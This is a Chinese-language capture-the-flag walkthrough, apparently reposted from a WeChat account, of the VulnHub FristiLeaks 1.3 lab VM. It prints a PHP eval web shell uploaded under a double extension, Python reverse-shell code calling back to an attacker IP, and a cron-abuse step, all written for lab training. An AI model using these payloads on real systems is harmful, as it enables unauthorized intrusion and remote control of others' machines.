VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

admin 2025年3月3日09:43:51评论12 views字数 3161阅读10分32秒阅读模式
 

一、靶机搭建

选择扫描虚拟机

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

选择路径即可

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

二、信息收集

靶机信息

产品名称:Fristileaks 1.3
作者:Ar0xA 
发布日期: 2015 年 12 月 14 日
目标:获取root(uid 0)并读取标志文件     #UID为0,即root权限
难度:初级 
说明: 一个为荷兰非正式黑客聚会Fristileaks制作的小型虚拟机。意味着可以在几个小时内破解,而不需要调试器、逆向工程等。。

扫ip

靶机ip:192.168.108.149

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

扫开放端口

只开放了一个80端口

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

扫版本服务信息

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

信息如下:

80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

指纹探测

nmap 192.168.108.149 -p 80 -sV -sC -O --version-all 
VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

信息如下:

运行版本: Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)

目录扫描

dirb扫描

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

dirsearch扫描

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

信息如下:

http://192.168.108.149/robots.txt
http://192.168.108.149/index.php

三、Web渗透

信息收集

看看80端口,给了个提示,应该在4个小时完成

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

访问之前扫描出来的robots.txt,给了下面的提示

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

逐个访问都是下面的提示

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

这里根据一开始页面的信息,试了fristi目录,是一个登录页面

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

看看源码,意思是源码的图片使用base64加密,并且放了一些信息,作者:eezeepz,这个作者很重要

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

翻到下面是一串base64编码,解码过来是图片转过来的

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

利用随波逐流转换成图片

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

得到下面的信息,keKkeKKeKKeKkEkkEk,应该是密码

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

登录

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

登录成功

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

文件上传

点击上传文件,先上传一个php后缀木马,发现只允许上传图片格式

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

这里利用 shell.php.jpg上传,实际上会被服务器认为是jpg文件,但是会解析php内容

track
<?php @eval($_POST["a"]);?>
VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

访问成功

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

执行一下系统命令

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

python反弹shell

代码如下

url/fristi/uploads/shell.php.jpg?a=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.108.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

反弹成功

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

四、提权

信息收集

找找可以利用的信息

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

进入home目录看看,在提权的时候,没有什么头绪就可以去home目录和tmp目录下看看,发现三个目录,进入eezeepz看看

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

ls -la查看一下,发现一个notes.txt文件

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

查看该文本

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

如下

我让你可以做一些自动检查,但我只允许您访问/usr/bin/*系统二进制文件。
然而,我确实复制了一些额外的经常需要的命令到我的homedir:chmod、df、cat、echo、ps、grep、egrep,这样您就可以使用它们了
来自/home/admin/
不要忘记为每个二进制文件指定完整路径!
只需在/tmp/中放入一个名为“runthis”的文件,每行一个命令。这个输出转到/tmp/中的文件“cronresult”。它应该以我的帐户权限每分钟运行一次。

反向shell+脚本解密

这里的意思应该是只能利用 /usr/bin目录下的文件,要求在/tmp目录下放一个runthis文件,以amdin权限每分钟运行一次,写一个脚本

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

这是一个反向shell脚本

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.108.130",5555));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

开启web服务

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

进入tmp目录,将其下载下来

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

将1.py执行的结果输入到runthis,即每分钟在该目录下执行一次

echo '/usr/bin/python /tmp/1.py' > runthis
VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

这里开启监听,不过需要等一会,链接成功

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

先用python切换为交互模式,发现两个文本还有一个可能是用户名fristigod

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

信息如下,是某种加密而且做了逆向输出

cryptedpass.txt:mVGZ3O3omkJLmy2pcuTq
whoisyourgodnow.txt:=RFn0AKnlMHMPIzpyuTI0ITG

看看加密脚本

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

defencodeString(str):
    base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

写一个解密脚本2.py

import base64,codecs,sys

defdecodeString(str):
    base64string= codecs.decode(str,'rot13')
return base64.b64decode(base64string[::-1])

cryptoResult=decodeString(sys.argv[1])
print cryptoResult

赋予权限并执行

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

执行

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

得到以下信息

thisisalsopw123
LetThereBeFristi!

链接新用户

链接fristigod用户,尝试上面的密码

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

执行成功,找找可以信息,发现一处任何用户都可以执行的脚本

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

直接以当前用户执行它并赋予bash权限

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

提权成功

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

找找flag在那,成功发现

VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

end

原文始发于微信公众号(泷羽Sec-track):VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月3日09:43:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub-FristiLeaks_1.3靶机-泄露加解密+文件上传+反向shellhttps://cn-sec.com/archives/3786325.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息